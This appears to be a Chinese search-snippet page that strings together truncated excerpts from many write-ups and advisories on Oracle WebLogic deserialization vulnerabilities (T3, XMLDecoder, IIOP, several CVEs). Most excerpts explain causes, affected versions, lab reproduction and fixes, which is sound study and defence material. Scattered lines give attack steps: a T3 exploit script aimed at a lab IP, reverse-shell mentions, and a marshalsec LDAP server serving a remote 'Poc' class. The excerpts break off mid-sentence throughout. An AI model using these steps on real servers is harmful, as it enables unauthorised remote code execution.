先引用一下奇安信团队发出的weblogic历史漏洞图,可以发现以反序列化为主,反序列化问题主要来自XMLDecoder和T3协议 image.png T3协议 weblogic t3协议就是weblogic...jdk1.7,weblogic10.3.6.0 用cc链1,3,6都能打。 这个洞可以说是weblogic反序列化漏洞的源头了。...这个方法的作用是类的序列化描述符加工成该类的Class对象,很多针对反序列化Gadget的拦截都是通过重写此方法完成的(如通过黑名单来禁止某类反序列化) 贴上一张廖师傅的博客的反序列化攻击时序图: 可以看到反序列化拦截位置除了...CVE-2017-3506&CVE-2017-10271 影响范围 WebLogic 10.3.6.0 WebLogic 12.1.3.0 WebLogic 12.2.1.0 WebLogic 12.2.1.1...WebLogic 12.2.1.2 该漏洞利用weblogic的wls-wsat组件对XML用XMLDecoder进行解析的功能,从而对其传入恶意XML数据造成反序列化攻击。
这是Web Container和EJB Container的主要区别)在Weblogic Server中执行反序列化操作,利用RMI(远程方法调用) 机制的缺陷,通过JRMP协议(Java Remote...Messaging Protocol:java远程消息交换协议)达到执行任意反序列化payload的目的。...影响版本 Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2 Weblogic 12.2.1.3 漏洞复现 1.靶机环境搭建 用docker拉取靶机镜像...docker pull vulhub/weblogic:10.3.6.0-2017 注:镜像2G+,记得换源等操作。...创建启动靶机容器 docker run -d -p 5003:7001 vulhub/weblogic:10.3.6.0-2017 注:5003为外部映射端口,可自定义 2.漏洞检测利用 反弹shell
Step 9:在我们的攻击主机中再次执行载荷发现已经无效了(此处的test.ser为通过ysoserial生成的cc1链calc序列化数据文件) python2 weblogic_t3.py 192.168.174.144...,之后再通过调用readObject()方法进行反序列化的数据的读取,这样一来我们就可以反序列化,CVE-2016-0638正是基于这样的思路找到了weblogic.jms.common.StreamMessageImpl...,下面进行详细分析~ 漏洞原理 该漏洞实现反序列化的思路是将反序列化的对象封装进weblogic.corba.utils.MarshalledObject,然后再对MarshalledObject进行序列化...,生成payload字节码,反序列化时MarshalledObject不在WebLogic黑名单中,所以可正常进行反序列化,而在反序列化时MarshalledObject对象再调用readObject时对...MarshalledObject封装的序列化对象再次反序列化,从而逃过了黑名单的检查。
参考 Weblogic-SSRF漏洞复现 Weblogic-反序列化漏洞 漏洞简介 Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。...该漏洞通过T3协议发送恶意的反序列化数据绕过了Weblogic的黑名单,成功反序列化执行任意命令。但该漏洞利用条件较高,官方也归类为需要身份认证。...这个漏洞需要满足以下两个条件: Weblogic开启T3协议 可以获取到SerializedSystemIni.dat文件 影响版本 WebLogic Server 10.3.6.0 WebLogic...运行Poc.java生成poc.ser序列化文件。...修复建议 如果不依赖T3协议进行JVM通信,可禁用T3协议 排查弱口令 升级补丁 参考 WebLogic 反序列化漏洞(CVE-2019-2890)分析 Weblogic t3反序列化漏洞(CVE-2019
ac ed 00 05是java序列化内容的特征,漏洞挖掘人员通常对 weblogic 在 7001 端口的 T3 协议进行抓包,发现流量中有 java 反序列化之后数据的 Magic ac ed 00...3.T3协议 WebLogic Server 中的 RMI 通信使用 T3 协议在WebLogic Server和其他 Java程序(包括客户端及其他 WebLogic Server 实例)间传输数据(...由于WebLogic的T3协议和Web协议共用同一个端口,因此只要能访问WebLogic就可利用T3协议实现payload和目标服务器的通信。...4、Weblogic反序列化漏洞汇总 Weblogic反序列化高危漏洞主要涉及到两个种类: 1、利用xml decoded反序列化进行远程代码执行的漏洞,例如: CVE-2017-10271,CVE-2017...0x07 CNVD-C-2019-48814 概述: WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。
return x.check(url, cmd,20)if __name__ == '__main__': parser = argparse.ArgumentParser(description='Weblogic
影响范围 Oracle WebLogic Server 10.3.6.0.0 Oracle WebLogic Server 12.1.3.0.0 Oracle WebLogic Server 12.2.1.3.0...Oracle WebLogic Server 12.2.1.4.0 漏洞概述 2020年4月Oracle官方发布关键补丁更新公告CPU(Critical Patch Update),其中曝出两个针对WebLogic...,成功的漏洞利用可导致WebLogic Server被攻击者接管,从而造成远程代码执行。...之后序列化生成载荷: ? 之后发送T3请求到服务端之后成功执行命令: ?...之后序列化生成载荷: ? 之后发送T3请求到服务端之后成功执行命令: ?
与CVE-2019-2725漏洞相似,CVE-2019-2729漏洞是由于应用在处理反序列化输入信息时存在缺陷,攻击者可以通过发送精心构造的恶意HTTP请求,用于获得目标服务器的权限,并在未授权的情况下执行远程命令
漏洞简介事项描述漏洞概述wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。...由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。
CVE-2020-14644 weblogic iiop反序列化漏洞 0x00 weblogic 受影响版本 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0,...14.1.1.0.0 0x01 环境准备 1、安装weblogic server版本。...0x02 反序列化gadget分析。 这次iiop的关键反序列化类是RemoteConstructor。...transient和static修饰符修饰的成员变量不会参与序列化和反序列化反序列化对象和序列化前的对象的全类名和serialVersionUID必须一致在目标类中添加私有的writeObject和readObject...方法可以覆盖默认的序列化和反序列化方法在目标类中添加私有的readResolve可以最终修改反序列化回来的对象,可用于单例模式防止序列化导致生成第二个对象的问题readResolve操作是在readobject
weblogic 漏洞扫描工具 妄想试图weblogic一把梭 目前检测的功能 console 页面探测 & 弱口令扫描 uuid页面的SSRF CVE-2017-10271 wls-wsat页面的反序列化... CVE-2018-2628 反序列化 后期可以的话还会继续加功能的,主要是一些反序列化的poc真的不好写,我也不咋会.....2、扫描单一的url python3 weblogic-scan 127.0.0.1:7001 ?...uuid页面的SSRF以及wls-wsat反序列化会在server服务器中留下日志文件。 会在域名前带上受影响机子的地址,这样扫描多个地址的时候方便做区分。 ?...漏洞扫描工具 项目地址:weblogic-scan
本文作者:TtssGkf(Ms08067实验室 SRSP TEAM小组成员) Weblogic反序列化漏洞是一个经典的漏洞系列,根源在于Weblogic(及其他很多java服务器应用)在通信过程中传输数据对象...,涉及到序列化和反序列化操作,如果能找到某个类在反序列化过程中能执行某些奇怪的代码,就有可能通过控制这些代码达到RCE的效果。...随着每次补丁的修复,很多Weblogic反序列化的思路都被封禁了,但是跟Struts2系列漏洞不同的是,Weblogic漏洞由于涉及的面比较广,所以近几年还是持续有新出漏洞的,这也体现了挖掘出新漏洞的高手们对...目前在做渗透测试时,Weblogic漏洞用来攻击没打补丁的系统会比较有效。...《从零开始weblogic的反序列化漏洞》的分享,带领大家了解weblogic的工作模式,明白漏洞原理,从而掌握调试weblogic反序列化漏洞的基本能力。
一、漏洞描述 4月17日,国家信息安全漏洞共享平台(CNVD)公开了Weblogic反序列化远程代码执行漏洞(CNVD-C-2019-48814)。...由于WebLogic安装包中默认SDK为1.6版本,在JDK版本<=JDK7u21前提下存在Java原生类反序列化漏洞,使用ysoserial工具生成恶意序列化对象(以计算器程序为例),可在调试器中查看到当前所传入的序列化对象...,最终利用JDK 7u21反序列化漏洞造成了远程代码执行。...from=timeline 升级本地JDK版本 因为Weblogic所采用的是其安装文件中默认1.6版本的JDK文件,属于存在反序列化漏洞的JDK版本,因此升级到JDK7u21以上版本可以避免由于Java...原生类反序列化漏洞造成的远程代码执行。
WebLogic Server组件进行攻击。...成功利用该漏洞的攻击者可以接管WebLogic Server。...这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。...0x03 影响版本 Oracle WebLogic Server 10.3.6.0.0 Oracle WebLogic Server 12.1.3.0.0 Oracle WebLogic Server...12.2.1.3.0 Oracle WebLogic Server 12.2.1.4.0 Oracle WebLogic Server 14.1.1.0.0 0x04 环境搭建 系统环境:window10
月份发布的最新安全补丁中修复了许多安全漏洞,其中黑名单类oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor可造成反序列化漏洞...0x03 影响版本 Oracle WebLogic Server 12.2.1.3.0 Oracle WebLogic Server 12.2.1.4.0 Oracle WebLogic Server...Weblogic下载链接: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html...-cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://192.168.247.128/#Poc 1389 3、运行 payload 文件生成反序列化数据文件...至此,我们可以通过反序列化已经可以调用任意类的无参方法。很容易联想到 CVE-2020-14645 和 fastjson 的利用方式,即通过JdbcRowSetImpl进行 JNDI 注入。
漏洞影响 Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2 Weblogic 12.2.1.3 Weblogic 反序列化漏洞历程 这里简单的说下几个有公开利用方式的...Weblogic反序列化漏洞。...CVE-2016-0638 Weblogic的反序列化的点有着三个,黑名单ClassFilter.class也作用于这三个位置。...CVE-2016-3510 原理是将反序列化的对象封装进了` weblogic.corba.utils.MarshalledObject`,然后再对 `MarshalledObject `进行序列化,生成...反序列化时 `MarshalledObject` 不在 WebLogic 黑名单里,可正常反序列化,在反序列化时 `MarshalledObject `对象调用 `readObject` 时对 `MarshalledObject
Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。...WebLogic中默认包含的wls-wast 与wls9_async_response war包,由于以上WAR包采用XMLDecoder反序列化机制来处理发送过来的XML数据,远程恶意攻击者可以通过发送精心构造的...Weblogic因为XMLDecoder反序列化不安全数据导致的漏洞目前有三个,第一个是CVE-2017-3506 ,第二个是CVE-2017-10271。...二、影响版本 Oracle WebLogic Server 10.x Oracle WebLogic Server 12.1.3 三、漏洞危害 1.可通过访问路径/_async/AsyncResponseServiceSoap12...\tmp\_WL_internal\%DOMAIN_HOME%\servers\AdminServer\tmp\.internal\Oracle WebLogic Server 12.1.3 :\Middleware
01 背景 Oracle官方在修补老的Weblogic反序列化漏洞时,将已经在互联网上暴露的PoC都加入了黑名单,所以若是绕过他的黑名单限制就依旧可以触发命令执行。...接下来我们简单分析一下本次漏洞的成因,具体的weblogic反序列化漏洞原理这里不做具体分析,之后可以分享一次专题。...tcp连接获取RMI registry,加载回来再利用readObject解析,从而造成反序列化远程代码执行。...但是我们也知道,java会将对象序列化成字节码,如何在字节码中找到我们需要修改的ip和端口成为了一个问题。以下是我们的解决方法以及可以提供反序列化漏洞的一些研究方案。...,便于大部分人理解序列化和反序列化的原理,也便于后续漏洞的分析,有问题和想法的同学欢迎和我们共同探讨交流。
预警编号:NS-2018-0020 2018-07-18 TAG: Oracle WebLogic、CVE-2018-2893、反序列化 危害等级: 高,此漏洞可远程利用,已有攻击脚本且利用简单,攻击者可直接获取系统控制权限...反序列化漏洞(CVE-2018-2628),但由于Weblogic采用黑名单的方式阻止恶意反序列化,仍存在被绕过的可能。...绿盟科技4月份发布的针对Weblogic反序列化漏洞(CVE-2018-2628)漏洞的安全防护方案对此漏洞(CVE-2018-2893)仍有效,前期已经按照绿盟科技安全防护方案部署过防护措施的企业,已具有针对此漏洞的防护能力.../cpujul2018-4258247.html SEE MORE → 2影响范围 受影响的版本 Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2...此漏洞影响到Oracle官方现支持的所有版本,若通过防火墙限定了Weblogic服务端口(默认为7001和7002端口)的开放,或者通过限定Weblogic T3服务远程访问,则可缓解此漏洞攻击影响,降低被攻击的风险
目录 一,漏洞信息 二,实验环境 三,漏洞利用 第一步.查看其是否开启了wls9_async_response组件 1.打开Centos 2.开启weblogic 3.访问weblogic 4.查看async...查看终端监听 方法二:python脚本使用方法 1.监听 2.使用python脚本 3.查看终端监听 编辑 四,解决办法 一,漏洞信息 漏洞编号:OracleWebLogic wls9-async反序列化远程命令执行漏洞...(CNVD-C-2019-48814) 影响版本:WebLogic 10.x WebLogic 12.1.3 WebLogic Server是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件...存在于weblogic自带的wls9_async_response.war组件及wls-wsat组件中,在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意HTTP 请求,未授权的情况下远程执行命令...部分版本WebLogic中默认包含的wls9_async_response包,主要是为WebLogic Server提供异步通讯服务。 反序列化:就是讲字节序列转化成对象的过程。
领取专属 10元无门槛券
手把手带您无忧上云